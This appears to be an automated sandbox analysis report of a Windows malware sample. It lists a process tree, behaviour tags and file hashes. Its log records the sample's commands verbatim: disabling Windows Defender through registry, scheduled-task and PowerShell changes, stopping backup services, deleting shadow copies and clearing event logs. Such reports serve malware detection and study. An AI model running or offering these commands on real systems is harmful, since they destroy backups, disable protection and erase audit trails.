windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1964 wrote to memory of 2516 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2516 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2516 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2516 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 2516 wrote to memory of 2620 2516 net.exe net1.exe PID 2516 wrote to memory of 2620 2516 net.exe net1.exe PID 2516 wrote to memory of 2620 2516 net.exe net1.exe PID 2516 wrote to memory of 2620 2516 net.exe net1.exe PID 1964 wrote to memory of 2632 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2632 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2632 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2632 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 2632 wrote to memory of 2560 2632 net.exe net1.exe PID 2632 wrote to memory of 2560 2632 net.exe net1.exe PID 2632 wrote to memory of 2560 2632 net.exe net1.exe PID 2632 wrote to memory of 2560 2632 net.exe net1.exe PID 1964 wrote to memory of 2756 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2756 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2756 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2756 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 2756 wrote to memory of 2664 2756 net.exe net1.exe PID 2756 wrote to memory of 2664 2756 net.exe net1.exe PID 2756 wrote to memory of 2664 2756 net.exe net1.exe PID 2756 wrote to memory of 2664 2756 net.exe net1.exe PID 1964 wrote to memory of 2540 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2540 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2540 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2540 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 2540 wrote to memory of 2752 2540 net.exe net1.exe PID 2540 wrote to memory of 2752 2540 net.exe net1.exe PID 2540 wrote to memory of 2752 2540 net.exe net1.exe PID 2540 wrote to memory of 2752 2540 net.exe net1.exe PID 1964 wrote to memory of 2568 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2568 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2568 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2568 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 2568 wrote to memory of 2436 2568 net.exe net1.exe PID 2568 wrote to memory of 2436 2568 net.exe net1.exe PID 2568 wrote to memory of 2436 2568 net.exe net1.exe PID 2568 wrote to memory of 2436 2568 net.exe net1.exe PID 1964 wrote to memory of 2432 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2432 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2432 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2432 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 2432 wrote to memory of 2544 2432 net.exe net1.exe PID 2432 wrote to memory of 2544 2432 net.exe net1.exe PID 2432 wrote to memory of 2544 2432 net.exe net1.exe PID 2432 wrote to memory of 2544 2432 net.exe net1.exe PID 1964 wrote to memory of 2576 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2576 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2576 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2576 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 2576 wrote to memory of 1724 2576 net.exe net1.exe PID 2576 wrote to memory of 1724 2576 net.exe net1.exe PID 2576 wrote to memory of 1724 2576 net.exe net1.exe PID 2576 wrote to memory of 1724 2576 net.exe net1.exe PID 1964 wrote to memory of 2408 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2408 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2408 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 1964 wrote to memory of 2408 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe net.exe PID 2408 wrote to memory of 2428 2408 net.exe net1.exe PID 2408 wrote to memory of 2428 2408 net.exe net1.exe PID 2408 wrote to memory of 2428 2408 net.exe net1.exe PID 2408 wrote to memory of 2428 2408 net.exe net1.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:2620
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2560
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2752
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2436
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2544
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1724
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2428
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:2440
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:1740
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:3060
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:2164
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:1620
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:828
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1368
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:2468
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:496
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1016
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1236
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2308
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2720
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1048
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2024
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3040
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2844
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2824
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2216
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2148
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:456
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1744
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:688
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2152
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1472
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1328
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:980
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2784
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2812
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2892
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2768
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54e68cfad3f3cbef5406c90fd9e9d7931
SHA1504d53957bbed8e1a612c791eec7abdd17bd15bc
SHA25651dc299391f9b3eca411936a0d01781ad68799d282655e0d20c8c8521aa8e014
SHA51278c89847c3a7c128e5d54c3fff0e41c89a61722730b9d02d9c7e0b6985ce8188c3c37b6357a71c30f7e34c8b78f94599a186be6c189e56f6ccb832033e77172a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD595d17bdcaee98120ec370e7028791e38
SHA1511d9e02f9fff85d3f65cf860619aff68fcc9bad
SHA2564b4b9044dc5225ad012f2e98d99e83f805e3147c6a03c32d96b61710844509f5
SHA512310141915da2919c94c1b16950b998454e0de01fe1a804d5186b514abf6ca4c844047718eb01ec10ba4b67857b401ae22c1d4b7290f174d54e75662fee605224
-
Filesize
72.6MB
MD5064bb8c833c00a2f19d18c90f4b71808
SHA1686576c8b1223067168e2204c58e75a3fab21f27
SHA2567061116a6ea9e43e6c442d442dabd0546580a9851649451c217f9fb8584d4ce2
SHA51260fd758942a13153ab4a81eee66e7cbd94f9034a68a51d78575270c1b56c89bd6ac996146155e5445560b55d14daff72baea5ad4d377edb179c993fa6ae6aa00